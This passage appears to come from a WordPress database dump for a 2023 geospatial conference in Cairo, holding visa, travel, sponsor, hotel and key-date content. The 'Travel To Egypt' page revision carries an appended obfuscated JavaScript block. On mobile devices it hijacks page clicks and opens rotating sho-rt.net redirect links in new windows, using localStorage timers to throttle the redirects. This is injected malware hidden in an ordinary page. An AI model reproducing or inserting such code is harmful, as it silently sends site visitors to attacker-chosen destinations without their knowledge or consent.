letter.</li>\n</ul>\n<p>&nbsp;</p>\n<ul style=\"font-weight: 400;\">\n<li>For most nationalities, reciving a visa for Egypt can be done on arrival at Cairo International Airport or online via the Egyptian Government\'s official e-visa portal <span style=\"color: #808080;\"><strong>(<a style=\"color: #808080;\" href=\"https://visa2egypt.gov.eg/eVisa/Home?VISTK=OA4K-0JST-POSC-FLL7-FEVD-OUJ5-QIZH-78YZ-GYQ9-9IQQ-K5BB-E03R-EOBW-KVT6-S9CK-X3W9\" data-saferedirecturl=\"https://www.google.com/url?q=https://visa2egypt.gov.eg/eVisa/Home?VISTK%3DOA4K-0JST-POSC-FLL7-FEVD-OUJ5-QIZH-78YZ-GYQ9-9IQQ-K5BB-E03R-EOBW-KVT6-S9CK-X3W9&amp;source=gmail&amp;ust=1685249456207000&amp;usg=AOvVaw3sDw0ljxu0W2nRhsTa3oTm\">https://visa2egypt.gov.eg/eVisa/Home?VISTK=OA4K-0JST-POSC-FLL7-FEVD-OUJ5-QIZH-78YZ-GYQ9-9IQQ-K5BB-E03R-EOBW-KVT6-S9CK-X3W9</a>)</strong></span>. Nationals of the countries listed below may be issued with an e-Visa upon application on the Egypt e-Visa Portal</li>\n</ul>\n<p style=\"font-weight: 400;\"><strong> </strong></p>\n<table style=\"font-weight: 400;\" width=\"1088\">\n<tbody>\n<tr>\n<td>Albania</td>\n<td>Argentina</td>\n<td>Armenia</td>\n<td>Australia</td>\n</tr>\n<tr>\n<td>Austria</td>\n<td>Azerbaijan</td>\n<td>Bahrain</td>\n<td>Belarus</td>\n</tr>\n<tr>\n<td>Belgium</td>\n<td>Bolivia</td>\n<td>Bosnia and Herzegovina</td>\n<td>Brazil</td>\n</tr>\n<tr>\n<td>Bulgaria</td>\n<td>Canada</td>\n<td>Chile</td>\n<td>China</td>\n</tr>\n<tr>\n<td>China/Hong Kong</td>\n<td>China/Taiwan</td>\n<td>Colombia</td>\n<td>Croatia</td>\n</tr>\n<tr>\n<td>Cyprus</td>\n<td>Czech</td>\n<td>Denmark</td>\n<td>Ecuador</td>\n</tr>\n<tr>\n<td>Estonia</td>\n<td>Finland</td>\n<td>France</td>\n<td>Georgia</td>\n</tr>\n<tr>\n<td>Germany</td>\n<td>Greece</td>\n<td>Hungary</td>\n<td>Iceland</td>\n</tr>\n<tr>\n<td>India</td>\n<td>Ireland</td>\n<td>Italy</td>\n<td>Japan</td>\n</tr>\n<tr>\n<td>Kazakhstan</td>\n<td>Korea (South)</td>\n<td>Kuwait</td>\n<td>Latvia</td>\n</tr>\n<tr>\n<td>Lithuania</td>\n<td>Luxembourg</td>\n<td>Macedonia</td>\n<td>Malaysia</td>\n</tr>\n<tr>\n<td>Malta</td>\n<td>Mexico</td>\n<td>Moldova</td>\n<td>Monaco</td>\n</tr>\n<tr>\n<td>Montenegro</td>\n<td>Netherlands</td>\n<td>New Zealand</td>\n<td>Norway</td>\n</tr>\n<tr>\n<td>Oman</td>\n<td>Paraguay</td>\n<td>Peru</td>\n<td>Poland</td>\n</tr>\n<tr>\n<td>Portugal</td>\n<td>Qatar</td>\n<td>Republic of Kosovo</td>\n<td>Romania</td>\n</tr>\n<tr>\n<td>Russian Federation</td>\n<td>San Marino</td>\n<td>Saudi Arabia</td>\n<td>Serbia</td>\n</tr>\n<tr>\n<td>Singapore</td>\n<td>Slovakia</td>\n<td>Slovenia</td>\n<td>South Africa</td>\n</tr>\n<tr>\n<td>Spain</td>\n<td>Sweden</td>\n<td>Switzerland</td>\n<td>Ukraine</td>\n</tr>\n<tr>\n<td>United Arab Emirates</td>\n<td>United Kingdom (England, Northern Ireland, Scotland and Wales)</td>\n<td>United States of America</td>\n<td>Uruguay</td>\n</tr>\n<tr>\n<td>Vatican</td>\n<td>Venezuela</td>\n<td></td>\n<td></td>\n</tr>\n</tbody>\n</table>\n<p style=\"font-weight: 400;\"><strong> </strong></p>\n<ul style=\"font-weight: 400;\">\n<li>Weather: in September: Around 25-30 degree in Cairo</li>\n<li>Cairo is reachable from over 70 countries through Egypt Air and Star Alliance members. The local organizing committee arranged for additional discount on air tickets from Egypt Air (Star Alliance). Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to: <strong><span style=\"color: #808080;\"><a style=\"color: #808080;\" href=\"mailto:GSW-EGYPTAIR@gsw2023.com\">GSW-EGYPTAIR@gsw2023.com</a></span></strong></li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Travel To Egypt','','inherit','closed','closed','','2675-revision-v1','','','2023-06-01 08:58:58','2023-06-01 08:58:58','',2675,'https://gsw2023.com/?p=4607',0,'revision','',0),
(4609,1,'2023-06-02 19:50:58','2023-06-02 19:50:58','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner 